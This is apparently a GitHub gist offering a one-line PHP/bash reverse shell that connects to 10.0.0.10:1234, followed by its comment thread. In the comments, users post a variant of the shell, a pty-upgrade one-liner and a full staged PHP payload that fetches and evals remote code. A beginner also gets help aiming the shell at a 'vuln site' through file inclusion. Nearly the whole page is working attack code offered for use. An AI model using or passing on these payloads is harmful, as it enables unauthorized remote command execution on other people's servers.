Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
A tiny PHP/bash reverse shell.
<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.10/1234 0>&1'");
@ChickenLover

This comment has been minimized.

Copy link

ChickenLover commented Aug 13, 2019

python -c 'import pty; pty.spawn("/bin/bash")'

@Serux

This comment has been minimized.

Copy link

Serux commented Dec 4, 2019

This shell was writing duplicate input when using a netcat listener.
removing the ampersand (&) solved my problem.

<?php
exec("/bin/bash -c 'bash -i > /dev/tcp/10.0.0.10/1234 0>&1'");
@rshipp

This comment has been minimized.

Copy link
Owner Author

rshipp commented Dec 18, 2019

note for anybody coming across this for whatever reason: i have zero tolerance for inappropriate comments on this or any project i control. be kind, or leave.

@nikkolai14

This comment has been minimized.

Copy link

nikkolai14 commented May 8, 2020

Is the ip my physical or public ip?

@Serux

This comment has been minimized.

Copy link

Serux commented May 8, 2020

If you want to connect to your computer within an intranet, or by VPN, then is the physical IP

(for example if you are 192.168.1.2 and you want 192.168.1.3 to connect to you, you must usa 192.168.1.2)

If you want a machine in the internet to connect with you, it should be the public one, and you may configure port forwarding in your router configuration.
(So you open your local port, 192.168.1.2:1337 , you configure your firewall and router to allow connections from your public address, for example 10.10.10.2:1337 and forward them to your computer, then from another computer on the internet you must use 10.10.10.2:1337)

@nikkolai14

This comment has been minimized.

Copy link

nikkolai14 commented May 8, 2020

@Serux

Thanks for the comment If I understand you correctly,

Here is my steps what I did,

  1. I use ngrok to publicly access my local site on the internet
  2. I start the nc in my terminal nc -nvlp 8080
  3. from the php script I use my physical ip then 8080
  4. I inject that remote url from a vuln site.
  5. the nc is now connected to that but the problem is that when I do commands it is on the webserver where I host my remote url

So what I want to achieve is access the vuln site using the reverse shell, I am still a beginner so forgive for that. is that possible?

thank you so much.

@Serux

This comment has been minimized.

Copy link

Serux commented May 8, 2020

@nikkolai14

I had to search what was ngrok.

So ngrok makes a localhost port public, like localhost:3000->publicweb.ngrok.io, so at this point you have something like a public subdomain and a public ip that forwards the connections to your localhost.

So when you execute the php script, it runs on the server that hosts the file (localhost) and tries to connect to the desired ip.

If your ip is in the same network as the server, (or your routing table is configured to forward to another network) the server tries to make the connection serverip->yourcomputerip:8080

So the php is being executed in your server, not in another site. The file needs to be executed from the server that you want to conect to, so that the php in that system executes the bash command.

So if that other server (remote url) executes that php( you upload the file and open the url) , you would need a public IP, because that server is on the internet and cannot find your physical ip. In this case you would need a public Ip.

I hope this helps. Ask me if there is something that you dont understand.
I'm writing this on my phone and is a bit difficult to structure the text.

@nikkolai14

This comment has been minimized.

Copy link

nikkolai14 commented May 9, 2020

@Serux

Thanks you so much for the reply. I'll try again about the public IP.

@SkyBoltDom

This comment has been minimized.

Copy link

SkyBoltDom commented May 30, 2020

This will work with any operating system on a server. This is a module from Rapid7 that should be used with their handler but you don't have to. Keep in mind this is a staged payload.
/*<?php /**/ error_reporting(0); $ip = 'PUT YOUR IP'; $port = PUT YOUR PORT; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.